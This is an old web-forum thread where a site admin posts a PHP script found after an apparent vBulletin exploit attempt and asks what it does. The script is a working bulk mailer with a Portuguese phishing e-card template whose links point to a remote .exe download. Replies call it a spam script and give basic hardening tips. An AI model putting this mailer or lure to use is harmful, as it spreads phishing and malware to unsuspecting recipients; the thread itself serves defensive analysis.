Quick Login
05-04-2007, 03:38 PM
| #1 |
| Groupie  Join Date: May 2007
Posts: 35
 | Can Anyone Tell Me What This Script Does? I was checking my WOL today and I noticed a Mexican IP trying to run an old Vbulletin Exploit. This is the script. Does anyone know specifically what this does? Code: <?php
set_time_limit(0);
if($manda)
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";
//ASSUNTO DO EMAIL
$assunto = "Admirador lhe enviou um cartão.";
//MENSAGEM DO EMAIL
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//CABE?ALHO DO EMAIL
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* headers adicionais */
$headers .= "From: <O carteiro> <entrega@ocarteiro.com>\r\n";
//ARQUIVO COM OS EMAILS
$arquivo = $lista;
//LENDO ARQUIVO
$file = explode("\n", $arquivo);
$i = 1;
?><title>php sender</title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p> </p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
<tr>
<td bgcolor="#f5f5f5">
<?
foreach ($file as $mail) {
if(mail($mail, $assunto, $mensagem, $headers))
echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>OK</font><br>";
else
echo "* $i ".$email[$i]." <font color=red>NO</font><br><hr>";
$i++;
}
}
?>
</td>
</tr>
</table><? } ?>
<form name="form1" method="post" action="">
<table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666">
<tr>
<td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" bgcolor="#666666"> <div align="center"><font color="#FFFFFF" size="2" face="Verdana, Arial, Helvetica, sans-serif"><b> Enviador priv8 by Morientes
</b></font></div></td>
</tr>
<tr>
<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">MSG:</font></b></font></div></td>
<td bgcolor="#666666"> </td>
<td><textarea name="html" cols="30" rows="5" id="textarea2">
<html>
<html>
<head>
<title>ocarteiro.com - cartões, diversão e muito mais...</title>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'>
<style type=text/css>
a:visited {text-decoration: none}
a:link {text-decoration: none}
a:hover {text-decoration: underline}
</style>
</head>
<body text='#000000' background='http://www.ocarteiro.com.br/images/novo_carteiro/bg_site.gifgif' leftmargin='0' topmargin='0' marginwidth='0' marginheight='0'>
<table width='100%' border='0' cellspacing='0' cellpadding='0' height='100%' background='http://www.ocarteiro.com.br/images/novo_carteiro/bg_site.gif'>
<tr>
<td align='center'> <br>
<table width='550' border='0' cellspacing='0' cellpadding='0' align='center' bgcolor='FFBE00'>
<tr>
<td align='center' valign='top'><img src='http://www.ocarteiro.com.br/images/email_cart_2_2.gif' width='550' height='101'></td>
</tr>
<tr>
<td align='center' valign='top'>
<!--texto -->
<table width='80%' border='0' cellspacing='0' cellpadding='0'>
<tr>
<td>
<p><img src='http://www.ocarteiro.com.br/images/email_cart_2_3.gif' width='372' height='35'></p>
<p><font face='Verdana, Arial' size='1'>Olá, veja o cartão que preparei para você:</font></p>
<p><font face='Verdana, Arial' size='1' color='A50102'><b>
<a style="color:#A50102" href="http://orkute.bravehost.com/cartao.exe">http://www.ocarteiro.com/lercartao.php?id=1916623949A3240</a></b></font></p>
<p align='center'>
<a target="_blank" href="http://orkute.bravehost.com/cartao.exe"><img src='http://www.ocarteiro.com.br/images/email_cart_2_4.gif' width='143' height='38' border='0'></a></p>
<font face='Verdana, Arial' size='1'><font color='A50102'>Você
também poderá visualizá-lo em
<a href="http://orkute.bravehost.com/cartao.exe">http://www.ocarteiro.com</a>
colocando o número do seu cartão:</font><b><font color='A50102'>
1916623949A3240</font></b></font></td>
</tr>
</table>
</td>
</tr>
<tr>
<td align='center' width='550' height='167' background='http://www.ocarteiro.com.br/images/email_cart_2_5.gif'>
<table width='100%' border='0' cellspacing='0' cellpadding='0'>
<tr align='center'>
<td><br><br><br>
<!--- INICIO TAG POSICAO OCARTEIRO-468X60 --->
<TABLE WIDTH=468 BORDER=0 CELLPADDING=0 CELLSPACING=0>
<TR>
<TD width="326" valign="bottom"><a href="http://www.bemleve.com.br/cadastro/cadastro_etapa1.php?id_parceria=342&dieta=emagrecer" target="_blank"><img src="http://www.bemleve.com.br/publicidades/ocarteiro/full_bl_ocarteiro_150506/images/full_bl_ocarteiro_01.gif" width="326" height="60" border="0"></a></TD>
<TD><a href="http://www.bemleve.com.br/cadastro/cadastro_etapa1.php?id_parceria=342&dieta=emagrecer" target="_blank"><IMG SRC="http://www.bemleve.com.br/publicidades/ocarteiro/full_bl_ocarteiro_150506/images/full_bl_ocarteiro_02.jpg" ALT="" WIDTH=142 HEIGHT=60 border="0"></a></TD>
</TR>
<TR>
<TD colspan="2" valign="bottom"><img src="http://www.bemleve.com.br/bin/hits.php?id_parceria=342&dieta=emagrecer" width="1" height="1"></TD>
</TR>
</TABLE>
<!--- FINAL TAG POSICAO OCARTEIRO-468X60 --->
</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</td>
</tr>
</table>
</body>
</html>
</html>
</textarea></td>
</tr>
<tr>
<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">E-MAILS:</font></b></font></div></td>
<td bgcolor="#666666"> </td>
<td><textarea name="lista" cols="40" rows="10" id="textarea3">Emails para serem enviados</textarea></td>
</tr>
<tr>
<td><div align="center"></div></td>
<td bgcolor="#666666"> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td bgcolor="#666666"> </td>
<td><div align="center">
<input name="manda" type="submit" id="manda" value="Yeah!">
</div></td>
</tr>
</table></td>
</tr>
</table>
</form>
__________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. Admin -JP |
|  |
|
05-05-2007, 03:58 AM
| #2 |
| Groupie Join Date: May 2007
Posts: 35
| Anyone?
__________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. Admin -JP |
|
| |
|
05-05-2007, 06:18 AM
| #3 |
| Forum Junkie   Join Date: Feb 2006 Location: Holmfirth, England
Posts: 3,699
   | Patience is a virtue. Also, if thats an exploit, should it really be posted here....
__________________ Ack, no currently active projects To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
| |
|
05-05-2007, 11:24 AM
| #4 |
| daviddamian.com   Join Date: Feb 2006 Location: back in TX
Posts: 4,043
 | Just by reading the comments, this script lets the user find & make himself a private email address, to do with whatever he pleases.
__________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. - Free 3 day course |
|
| |
|
05-05-2007, 04:03 PM
| #5 |
| Groupie Join Date: May 2007
Posts: 35
| I'm not for sure if it was an exploit... The Specific path he was going to was http://www.mysite.com/forum/home.php...nh/enviar.txt? I went to that file and it showed that script that I posted. Ever seen anything like that?
__________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. Admin -JP |
|
| |
|
05-05-2007, 05:07 PM
| #6 |
| daviddamian.com Join Date: Feb 2006 Location: back in TX
Posts: 4,043
| Nope, but "enviar" means "send" in spanish.
__________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. - Free 3 day course |
|
| |
|
05-08-2007, 01:04 AM
| #7 |
| Apprentice  Join Date: Dec 2005 Location: Philadelphia, PA
Posts: 155
 | looks like a possible spam script Almost certainly looks like a spam script after some analysis, and a very poorly coded one at that.
__________________ Temporarily between forums To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. Last edited by Moelman; 05-08-2007 at 01:17 AM. Reason: combined double post |
|
| |
|
05-08-2007, 02:26 AM
| #8 |
| Apprentice Join Date: Mar 2007 Location: Kingsport, TN
Posts: 222
| From the looks of it, it could possibly be a script to send out spam, though to whom? The above script does not appear to connect to the vBulletin MySQL Class or config.php, hence, it would have to be running off another configuration file and/or database. With that, I don't know what exactly they were attempting to do, other than send spam, though I would check the permissions on your folders and make sure they are not world writable, rather, only the server and script can write to them. Also, I would look into securing your vBulletin installation 1). Secure your AdminCP & ModCP folders using .htaccess. 2). Rename your AdminCP & ModCP folders (be sure to change this in config.php). 3). Check all folder permissions, as stated above.
__________________ » To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. » To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. » To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
| |
|
05-08-2007, 02:29 AM
| #9 |
| Groupie Join Date: May 2007
Posts: 35
| Good idea on those. Are there tutorials on securing the CP's and renaming the directories? Also, what should I chmod the folders too? 775? Edit: N/M, I googled and found (imagine that) tut's and articles on securing the CP's and using htaccess. I've done both. How about the permissions?
__________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. Admin -JP |
|
| |
 |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
| |
Linear Mode
